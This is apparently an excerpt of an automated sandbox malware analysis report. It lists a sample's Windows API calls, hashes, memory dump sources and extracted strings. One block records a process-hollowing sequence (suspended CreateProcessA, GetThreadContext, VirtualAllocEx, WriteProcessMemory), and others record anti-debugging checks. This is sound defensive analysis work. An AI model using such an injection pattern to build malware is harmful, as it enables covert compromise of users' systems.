                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00CD9350
                • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00CD9361
                • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00CD9372
                • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00CD9383
                • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00CD9394
                • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00CD93A5
                • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00CD93B6
                • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00CD93C7
                • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00CD93D8
                • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00CD93E9
                • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00CD93FA
                • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00CD940B
                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00CD941C
                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00CD942D
                • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00CD943E
                • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00CD944F
                • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00CD9460
                • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00CD9471
                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00CD9482
                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00CD9493
                • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00CD94A4
                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00CD94B5
                • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00CD94C6
                • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00CD94D7
                • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00CD94E8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: AddressProc$HandleModule
                • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                • API String ID: 667068680-295688737
                • Opcode ID: 921c72e52c7ec2c07897391235894e3582b320a73f66bde2f950d253cdc7d60b
                • Instruction ID: 91b0b11209a51e003f2012b4a320042519dd2592e9d2f1a74943d99cce5cf51d
                • Opcode Fuzzy Hash: 921c72e52c7ec2c07897391235894e3582b320a73f66bde2f950d253cdc7d60b
                • Instruction Fuzzy Hash: 4F61A975956360BFCB009FB4AC4DBA63EA8FB1A741314841AF189D23A4DFF640899F74
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID:
                • String ID: 246122658369$3Iy=$3YG=$3Yy=$eMLY5DB0Qy =$eMLY5zdpQw==
                • API String ID: 0-1672437353
                • Opcode ID: 962e7c637f34f9bbe04225d631a0a9fb4102ce8244c819a63c374f8b65eb906d
                • Instruction ID: bfb96f2832acc36054790b072bfac0b1c12b13045acb0a2ada548cb3b72bd0ee
                • Opcode Fuzzy Hash: 962e7c637f34f9bbe04225d631a0a9fb4102ce8244c819a63c374f8b65eb906d
                • Instruction Fuzzy Hash: 05120571A002489BEF08EFA8CD8ABDDBB75EF45300F50414DE419A73C2D7759A85DBA2
                APIs
                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00CB809D
                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00CB80FB
                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00CB8114
                • GetThreadContext.KERNEL32(?,00000000), ref: 00CB8129
                • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00CB8149
                • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00CB818B
                • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 00CB81A8
                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CB8261
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
                • String ID: $VUUU$invalid stoi argument
                • API String ID: 3796053839-3954507777
                • Opcode ID: 274678620fc8687a221d36ee8b0e6d719e06d6699a7331da0ec0757594d6c49c
                • Instruction ID: a2f0d938e716c826989c17ac34d364d882610738d3ca33c051935c4b5e0006bb
                • Opcode Fuzzy Hash: 274678620fc8687a221d36ee8b0e6d719e06d6699a7331da0ec0757594d6c49c
                • Instruction Fuzzy Hash: FF416E74644341BFE7209F60DC06F9A7BE8FF88B01F004519B788E62D0DBB0A954CBA6
                APIs
                  • Part of subcall function 00CE6C20: GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
                  • Part of subcall function 00CE6C20: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3
                • GetACP.KERNEL32(?,?,?,?,?,?,00CE5027,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00CF2037
                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00CE5027,?,?,?,00000055,?,-00000050,?,?), ref: 00CF2062
                • _wcschr.LIBVCRUNTIME ref: 00CF20F6
                • _wcschr.LIBVCRUNTIME ref: 00CF2104
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00CF21C5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                • String ID: utf8
                • API String ID: 4147378913-905460609
                • Opcode ID: 90ca814f9054d6d4805b0190bf4aa8f35f08587af3fb6a40331f1d7e7a9e1966
                • Instruction ID: 489f295cb7790afdb1ee396b1453b7afd01e296c2864b3e037af4583da94704f
                • Opcode Fuzzy Hash: 90ca814f9054d6d4805b0190bf4aa8f35f08587af3fb6a40331f1d7e7a9e1966
                • Instruction Fuzzy Hash: FC71293260070EAAD764AB75CC42BBB77A8EF44740F14406AFB19D7281EB70DE41D766
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: __floor_pentium4
                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                • API String ID: 4168288129-2761157908
                • Opcode ID: dedd4ccc91dab65a3ea45bc87177d826b30bed9a4a41812d9bc23a3869fb5943
                • Instruction ID: d5f2fdedcb911d48da0b36b8e9cd4839d72c930ab81c4f87b318e218c52046a1
                • Opcode Fuzzy Hash: dedd4ccc91dab65a3ea45bc87177d826b30bed9a4a41812d9bc23a3869fb5943
                • Instruction Fuzzy Hash: BBD23B71E0862C8FDBA8CE28DD407EAB7B5EB45305F1441EAD61DE7240E774AE858F42
                APIs
                • GetLocaleInfoW.KERNEL32(?,2000000B,00CF2A20,00000002,00000000,?,?,?,00CF2A20,?,00000000), ref: 00CF279B
                • GetLocaleInfoW.KERNEL32(?,20001004,00CF2A20,00000002,00000000,?,?,?,00CF2A20,?,00000000), ref: 00CF27C4
                • GetACP.KERNEL32(?,?,00CF2A20,?,00000000), ref: 00CF27D9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: InfoLocale
                • String ID: ACP$OCP
                • API String ID: 2299586839-711371036
                • Opcode ID: beacb9f909223cffbe11d05ce503a9fcac3c4661942c7a1dee1b8191da1cf1e7
                • Instruction ID: 91a7ee9356211325c43ed474132472c5fac656f09a3a35fe2f954499af75aa21
                • Opcode Fuzzy Hash: beacb9f909223cffbe11d05ce503a9fcac3c4661942c7a1dee1b8191da1cf1e7
                • Instruction Fuzzy Hash: C221F536A00109E6D7B4AF55C900BB773A6EB50B54B664426EB1AD7214E732DF80C752
                APIs
                  • Part of subcall function 00CE6C20: GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
                  • Part of subcall function 00CE6C20: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3
                  • Part of subcall function 00CE6C20: _free.LIBCMT ref: 00CE6C82
                  • Part of subcall function 00CE6C20: _free.LIBCMT ref: 00CE6CB8
                • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00CF29E3
                • IsValidCodePage.KERNEL32(00000000), ref: 00CF2A2C
                • IsValidLocale.KERNEL32(?,00000001), ref: 00CF2A3B
                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00CF2A83
                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00CF2AA2
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                • String ID:
                • API String ID: 949163717-0
                • Opcode ID: 66214dbbe4a78bc93357d6147555923611f3b7c3dff20315a33adbd24865003f
                • Instruction ID: 4bff4ad767451222ff8a91f278ea5a23f9aae27223cf4a113f8a9df9360bf441
                • Opcode Fuzzy Hash: 66214dbbe4a78bc93357d6147555923611f3b7c3dff20315a33adbd24865003f
                • Instruction Fuzzy Hash: 97517172A00209AFDF60DFA5DC45BBE77B8EF08700F144529EA54E7191EBB09B44DB62
                APIs
                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CDA301
                • IsDebuggerPresent.KERNEL32 ref: 00CDA3CD
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CDA3ED
                • UnhandledExceptionFilter.KERNEL32(?), ref: 00CDA3F7
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                • String ID:
                • API String ID: 254469556-0
                • Opcode ID: 27d99017e78a67980598d814e9ac9a4320cf2bb8a0ba6fd8965295e31d8c61ce
                • Instruction ID: b794af23ad737e33ad8f27b3a0300b415ebdccc5bd43b8c973d815b3df0202bd
                • Opcode Fuzzy Hash: 27d99017e78a67980598d814e9ac9a4320cf2bb8a0ba6fd8965295e31d8c61ce
                • Instruction Fuzzy Hash: 07310575D013189BDB10DFA4D989BCDBBB8AF08304F1041AAE50DAB350EB709A859F55
                APIs
                  • Part of subcall function 00CE6C20: GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
                  • Part of subcall function 00CE6C20: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3
                  • Part of subcall function 00CE6C20: _free.LIBCMT ref: 00CE6C82
                  • Part of subcall function 00CE6C20: _free.LIBCMT ref: 00CE6CB8
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CF23DD
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CF2427
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CF24ED
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: InfoLocale$ErrorLast_free
                • String ID:
                • API String ID: 3140898709-0
                • Opcode ID: 3f7edd8df0cbcb16ec9ef4a4d83c9e8d8f8854208ee9b1f584b4c2b6a97bfb88
                • Instruction ID: 9d36c252ab56aa58050723e47a33e33eabf40fe2e238ee83c701c04eadd30641
                • Opcode Fuzzy Hash: 3f7edd8df0cbcb16ec9ef4a4d83c9e8d8f8854208ee9b1f584b4c2b6a97bfb88
                • Instruction Fuzzy Hash: 8961927195020B9FDB68DF28CC92BBA77A9FF04300F14417AEE15CA285E774DA81DB61
                APIs
                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00CDEDB5
                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00CDEDBF
                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00CDEDCC
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: d30f4e5d8851091de6e047c9ccb2883cc516459705a886b2d374b8b93f5c0950
                • Instruction ID: 9f1554cc31f310cb28b91c66ccf8e6d67a4a196a78582ff1b2214abaa96f120a
                • Opcode Fuzzy Hash: d30f4e5d8851091de6e047c9ccb2883cc516459705a886b2d374b8b93f5c0950
                • Instruction Fuzzy Hash: 0331B274901228ABCB21EF64DD8979DBBB8BF08710F5041EAE51CA6351EB749F818F54
                APIs
                • GetCurrentProcess.KERNEL32(?,?,00CDDCAF,00000000,00000000,?,00000000,?,00CE7EC1), ref: 00CDDCD2
                • TerminateProcess.KERNEL32(00000000,?,00CDDCAF,00000000,00000000,?,00000000,?,00CE7EC1), ref: 00CDDCD9
                • ExitProcess.KERNEL32 ref: 00CDDCEB
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                • Opcode ID: 043cd62f7c05a4d532eb99c7ec5d6f3b447c7c536434a277caa647e704748d87
                • Instruction ID: 7b928b5d5d07cafb2f1212483bd86fd5a0ff5d2b5cc73a0dfadba3944b9d3db3
                • Opcode Fuzzy Hash: 043cd62f7c05a4d532eb99c7ec5d6f3b447c7c536434a277caa647e704748d87
                • Instruction Fuzzy Hash: 52E0EC35421298AFCF126F68DD0AB4C3B6AFB81381F004415F90AC6331DB75DD91DB55
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0ac2c11185d8fc5ad81346666ec16ea2fa478ee6a3bab73839346bcea6eaf536
                • Instruction ID: bfb85aaeb15000afb4f75530c59b546ec3ca2aab2e1621b36fdca35591097f84
                • Opcode Fuzzy Hash: 0ac2c11185d8fc5ad81346666ec16ea2fa478ee6a3bab73839346bcea6eaf536
                • Instruction Fuzzy Hash: 62F12E71E002599FDF14CFA9C8846AEB7B5FF88314F15826DE929A7344D731AE41CB90
                APIs
                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CEC828,?,?,00000008,?,?,00CF62F0,00000000), ref: 00CECA5A
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ExceptionRaise
                • String ID:
                • API String ID: 3997070919-0
                • Opcode ID: d71c9b34f5e2f9ed1c689feed3607d2674e28f78e1cba7d447be9c93da2b3fa4
                • Instruction ID: f4b846518b65d054fd3a2bf17b4f36369850ceb98a67b5fb0cb2866f64310d04
                • Opcode Fuzzy Hash: d71c9b34f5e2f9ed1c689feed3607d2674e28f78e1cba7d447be9c93da2b3fa4
                • Instruction Fuzzy Hash: CBB14E32610649DFD714CF29C4C6B657BA0FF45364F258658E8EACF2A1C335EA92CB40
                APIs
                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CDA4F5
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: FeaturePresentProcessor
                • String ID:
                • API String ID: 2325560087-0
                • Opcode ID: d68b2a799040b740b9b34c20e5eb953d6a90058943018361a61f9faeb2508b31
                • Instruction ID: 39041765735f9ee55a8ee79461a6942c6a96c794891e392f1951360471c73907
                • Opcode Fuzzy Hash: d68b2a799040b740b9b34c20e5eb953d6a90058943018361a61f9faeb2508b31
                • Instruction Fuzzy Hash: FD519DB2A00705DFDB15CF55E8953AABBF0FB48310F24802AD521EB395E774DA41CBA1
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0c0e7907b6fc1f17ceecb70a10264084c4efc87338964174abbff4d05c5e63dc
                • Instruction ID: 1621851fcaebfed58f2217e991e6c44e11e79bd5b836cc5e104d7e8633d6d29f
                • Opcode Fuzzy Hash: 0c0e7907b6fc1f17ceecb70a10264084c4efc87338964174abbff4d05c5e63dc
                • Instruction Fuzzy Hash: 9641C2B580425DAEDB20EF69CC89AAEBBB8AF45300F1442EDE41DD3211DA309E858F50
                APIs
                  • Part of subcall function 00CE6C20: GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
                  • Part of subcall function 00CE6C20: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3
                  • Part of subcall function 00CE6C20: _free.LIBCMT ref: 00CE6C82
                  • Part of subcall function 00CE6C20: _free.LIBCMT ref: 00CE6CB8
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CF2630
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
